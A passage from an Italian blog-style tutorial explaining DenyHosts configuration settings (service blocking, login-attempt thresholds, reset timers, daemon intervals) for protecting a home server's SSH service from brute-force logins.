BLOCK_SERVICE = ALL Ok, abbiamo solo sshd attivo come servizio. Sarebbe più logico mettere BLOCK_SERVICE = sshd. De gustibus. Questo cambia ovviamente le occorrenze di /etc/hosts.deny che dal mio esempio precedente diventerebbero

# DenyHosts: Sat Nov 21 13:05:13 2009 | sshd: 123.123.123.123
sshd: 123.123.123.123

Denyhosts è molto configurabile, può controllare o tutti i servizi o solo quello che vogliamo noi.

DENY_THRESHOLD_INVALID = 2 Ogni due tentativi da parte di un username invalido (che non esiste sul sistema o che non è specificato in AllowUsers o AllowGroups in /etc/ssh/sshd_config) l’IP viene bannato. Metti che uno al posto di scrivere cicciobanza scrive cicciobnza…lo banniamo subito? Diamogli una seconda possibilità.

DENY_THRESHOLD_VALID = 3 Diamo invece tre tentativi a un user valido nel sistema, magari ha la giornata storta e sbaglia la password (che comunque, siamo stati bravi, è un’autenticazione chiave pubblica/privata).

DENY_THRESHOLD_ROOT = 1 Diciamo che se uno tenta subito root lo banniamo immediatamente..vero?

DENY_THRESHOLD_RESTRICTED = 1 Questa è una sboronata. Possiamo specificare degli username (in /var/lib/denyhosts/restricted-usernames) a cui possiamo dare tot tentativi. Io ho messo 1 perché ci metto i classici: mysql, test, user…i soliti username che non andrebbero mai usati…

WORK_DIR = /var/lib/denyhosts Si commenta da sola, io la lascio così di default e consiglio di fare altrettanto!

SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES A dire la verità non ho ben capito. Sembra che denyhosts si faccia dei sospetti di attacco anche sugli hosts della nostra sottorete e ci avverta di questo. Ho lasciato YES ma approfondirò in seguito…

HOSTNAME_LOOKUP=NO A dire la verità non ho capito molto questo. Non ho capito cosa se ne faccia denyhosts del nome host dell’IP associato che blocca. Approfondirò anche questo…

LOCK_FILE = /var/run/denyhosts.pid Si commenta da solo, lasciamolo così com’è.

ADMIN_EMAIL = Lo lascio vuoto, non ho nessun Postfix o simili installato sul sistema che invii mail di avvertimento quindi…

AGE_RESET_VALID=1m Resetta i tentativi, dopo un minuto di inattività, di un utente valido. Del tipo, scannate password, aspettate un minuto: avete ancora 3 tentativi (riguardate DENY_THRESHOLD_VALID).

AGE_RESET_ROOT= Se uno tenta root non gli diamo altre possibilità.

AGE_RESET_RESTRICTED= Se uno tenta mysql non gli diamo altre possibilità.

AGE_RESET_INVALID= Se uno tenta un utente invalido non gli diamo altre possibilità.

DAEMON_LOG = /var/log/denyhosts Si commenta da solo. Comunque è meglio aggiungere /var/log/denyhosts in /etc/logrotate.d/syslog-ng in modo che logrotate faccia la rotazione anche dei log di denyhosts.

DAEMON_SLEEP = 1m Ogni minuto denhyhosts controlla i file di log. Ci saranno comunque dei tentativi, in un minuto, gli script kiddies provano circa 5-10 username al colpo.

DAEMON_PURGE = 1h Il periodo, quando denyhosts è daemonizzato, con il quale controlla le occorrenze di /etc/hosts.deny e le toglie (in base ovviamente a PURGE_DENY)

Queste sono configurazioni base e utili per un sistema casalingo. Più fico sarebbe sincronizzare /etc/hosts.deny anche con IP bannati da altri che usando denyhosts e che condividono le informazioni (tutto sempre configurando denyhosts.cfg) ma è troppo per noi. Io ho provato ma, come ho già detto, non siamo bersagli fissi.